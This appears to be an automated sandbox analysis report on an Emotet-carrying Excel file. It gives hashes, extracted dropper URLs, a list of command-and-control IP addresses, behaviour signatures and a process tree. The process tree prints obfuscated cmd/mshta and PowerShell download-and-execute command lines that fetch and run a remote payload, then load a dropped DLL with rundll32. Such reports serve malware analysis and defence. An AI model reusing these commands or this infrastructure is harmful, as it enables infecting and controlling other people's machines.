Analysis

  • max time kernel
    145s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    20-01-2022 10:45

General

  • Target

    5bffdae22f776d781cab2ad5309a6154.xls

  • Size

    142KB

  • MD5

    5bffdae22f776d781cab2ad5309a6154

  • SHA1

    7943586d63be16066060c5482073b1313cbc78b0

  • SHA256

    a94875a62546e0ff04e0a0ff648b48bc6ad7071b539a8d41c8d1176ce4e1252b

  • SHA512

    7d1d540e1bb3c4850ae18c0d1fd80082c17b18e4d6c5992c8265ea2c6ba93bce1338669f82ad13115feb56c962bdd3e389173b97c484b325187d482438a4d7e8

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0xb907d607/fer/fer.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://185.7.214.7/fer/fer.png

Extracted

Family

emotet

Botnet

Epoch4

C2

131.100.24.231:80

209.59.138.75:7080

103.8.26.103:8080

51.38.71.0:443

212.237.17.99:8080

79.172.212.216:8080

207.38.84.195:8080

104.168.155.129:8080

178.79.147.66:8080

46.55.222.11:443

103.8.26.102:8080

192.254.71.210:443

45.176.232.124:443

203.114.109.124:443

51.68.175.8:8080

58.227.42.236:80

45.142.114.231:8080

217.182.143.207:443

178.63.25.185:443

45.118.115.99:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\5bffdae22f776d781cab2ad5309a6154.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1684
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1324
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1748
        • C:\Windows\SysWOW64\mshta.exe
          mshta http://0xb907d607/fer/fer.html
          3⤵
          • Blocklisted process makes network request
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1132
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fer.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2024
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1704
              • C:\Windows\SysWow64\rundll32.exe
                C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
                6⤵
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:1512
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                  7⤵
                  • Loads dropped DLL
                  • Drops file in System32 directory
                  • Suspicious use of WriteProcessMemory
                  PID:1644
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jkzqgrcqqlhd\hbuuzgdfztgy.uvm",mQSn
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1720
                    • C:\Windows\SysWOW64\rundll32.exe
                      C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jkzqgrcqqlhd\hbuuzgdfztgy.uvm",DllRegisterServer
                      9⤵
                      • Blocklisted process makes network request
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1552

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    System Information Discovery

    2
    T1082

    Query Registry

    1
    T1012

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Public\Documents\ssd.dll
      MD5

      321380dc019516dfff7c977712f3c4cc

      SHA1

      88a64b3ff6a5cc01696672a3c880a4753acaf330

      SHA256

      2200463c1d38d5aab53073663fb65625a6c6df671ac9c26ff35e6567cbc588a9

      SHA512

      15fc392df12e787e503b14f957b00ef703de66e2a5e7029d6a2a5a3d443ee33ba19429f8f140c3f9d9c4175ab7d3c01079417b21051cdc033eda9b81ff5dd763

    • \Users\Public\Documents\ssd.dll
      MD5

      321380dc019516dfff7c977712f3c4cc

      SHA1

      88a64b3ff6a5cc01696672a3c880a4753acaf330

      SHA256

      2200463c1d38d5aab53073663fb65625a6c6df671ac9c26ff35e6567cbc588a9

      SHA512

      15fc392df12e787e503b14f957b00ef703de66e2a5e7029d6a2a5a3d443ee33ba19429f8f140c3f9d9c4175ab7d3c01079417b21051cdc033eda9b81ff5dd763

    • \Users\Public\Documents\ssd.dll
      MD5

      321380dc019516dfff7c977712f3c4cc

      SHA1

      88a64b3ff6a5cc01696672a3c880a4753acaf330

      SHA256

      2200463c1d38d5aab53073663fb65625a6c6df671ac9c26ff35e6567cbc588a9

      SHA512

      15fc392df12e787e503b14f957b00ef703de66e2a5e7029d6a2a5a3d443ee33ba19429f8f140c3f9d9c4175ab7d3c01079417b21051cdc033eda9b81ff5dd763

    • \Users\Public\Documents\ssd.dll
      MD5

      321380dc019516dfff7c977712f3c4cc

      SHA1

      88a64b3ff6a5cc01696672a3c880a4753acaf330

      SHA256

      2200463c1d38d5aab53073663fb65625a6c6df671ac9c26ff35e6567cbc588a9

      SHA512

      15fc392df12e787e503b14f957b00ef703de66e2a5e7029d6a2a5a3d443ee33ba19429f8f140c3f9d9c4175ab7d3c01079417b21051cdc033eda9b81ff5dd763

    • \Users\Public\Documents\ssd.dll
      MD5

      321380dc019516dfff7c977712f3c4cc

      SHA1

      88a64b3ff6a5cc01696672a3c880a4753acaf330

      SHA256

      2200463c1d38d5aab53073663fb65625a6c6df671ac9c26ff35e6567cbc588a9

      SHA512

      15fc392df12e787e503b14f957b00ef703de66e2a5e7029d6a2a5a3d443ee33ba19429f8f140c3f9d9c4175ab7d3c01079417b21051cdc033eda9b81ff5dd763

    • \Users\Public\Documents\ssd.dll
      MD5

      321380dc019516dfff7c977712f3c4cc

      SHA1

      88a64b3ff6a5cc01696672a3c880a4753acaf330

      SHA256

      2200463c1d38d5aab53073663fb65625a6c6df671ac9c26ff35e6567cbc588a9

      SHA512

      15fc392df12e787e503b14f957b00ef703de66e2a5e7029d6a2a5a3d443ee33ba19429f8f140c3f9d9c4175ab7d3c01079417b21051cdc033eda9b81ff5dd763

    • \Users\Public\Documents\ssd.dll
      MD5

      321380dc019516dfff7c977712f3c4cc

      SHA1

      88a64b3ff6a5cc01696672a3c880a4753acaf330

      SHA256

      2200463c1d38d5aab53073663fb65625a6c6df671ac9c26ff35e6567cbc588a9

      SHA512

      15fc392df12e787e503b14f957b00ef703de66e2a5e7029d6a2a5a3d443ee33ba19429f8f140c3f9d9c4175ab7d3c01079417b21051cdc033eda9b81ff5dd763

    • \Users\Public\Documents\ssd.dll
      MD5

      321380dc019516dfff7c977712f3c4cc

      SHA1

      88a64b3ff6a5cc01696672a3c880a4753acaf330

      SHA256

      2200463c1d38d5aab53073663fb65625a6c6df671ac9c26ff35e6567cbc588a9

      SHA512

      15fc392df12e787e503b14f957b00ef703de66e2a5e7029d6a2a5a3d443ee33ba19429f8f140c3f9d9c4175ab7d3c01079417b21051cdc033eda9b81ff5dd763

    • \Users\Public\Documents\ssd.dll
      MD5

      321380dc019516dfff7c977712f3c4cc

      SHA1

      88a64b3ff6a5cc01696672a3c880a4753acaf330

      SHA256

      2200463c1d38d5aab53073663fb65625a6c6df671ac9c26ff35e6567cbc588a9

      SHA512

      15fc392df12e787e503b14f957b00ef703de66e2a5e7029d6a2a5a3d443ee33ba19429f8f140c3f9d9c4175ab7d3c01079417b21051cdc033eda9b81ff5dd763

    • memory/1324-58-0x000007FEFBEE1000-0x000007FEFBEE3000-memory.dmp
      Filesize

      8KB

    • memory/1552-97-0x0000000000310000-0x0000000000336000-memory.dmp
      Filesize

      152KB

    • memory/1552-99-0x0000000000370000-0x0000000000396000-memory.dmp
      Filesize

      152KB

    • memory/1552-101-0x0000000001F90000-0x0000000001FB6000-memory.dmp
      Filesize

      152KB

    • memory/1552-103-0x0000000002340000-0x0000000002366000-memory.dmp
      Filesize

      152KB

    • memory/1644-81-0x0000000000810000-0x0000000000836000-memory.dmp
      Filesize

      152KB

    • memory/1644-79-0x00000000006B0000-0x00000000006D6000-memory.dmp
      Filesize

      152KB

    • memory/1644-83-0x0000000000880000-0x00000000008A6000-memory.dmp
      Filesize

      152KB

    • memory/1644-85-0x00000000023D0000-0x00000000023F6000-memory.dmp
      Filesize

      152KB

    • memory/1684-54-0x000000002F781000-0x000000002F784000-memory.dmp
      Filesize

      12KB

    • memory/1684-57-0x0000000075D61000-0x0000000075D63000-memory.dmp
      Filesize

      8KB

    • memory/1684-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1684-55-0x00000000716D1000-0x00000000716D3000-memory.dmp
      Filesize

      8KB

    • memory/1684-125-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1720-94-0x00000000001C0000-0x00000000001E6000-memory.dmp
      Filesize

      152KB

    • memory/2024-65-0x0000000001C82000-0x0000000001C84000-memory.dmp
      Filesize

      8KB

    • memory/2024-64-0x0000000001C81000-0x0000000001C82000-memory.dmp
      Filesize

      4KB

    • memory/2024-63-0x0000000001C80000-0x0000000001C81000-memory.dmp
      Filesize

      4KB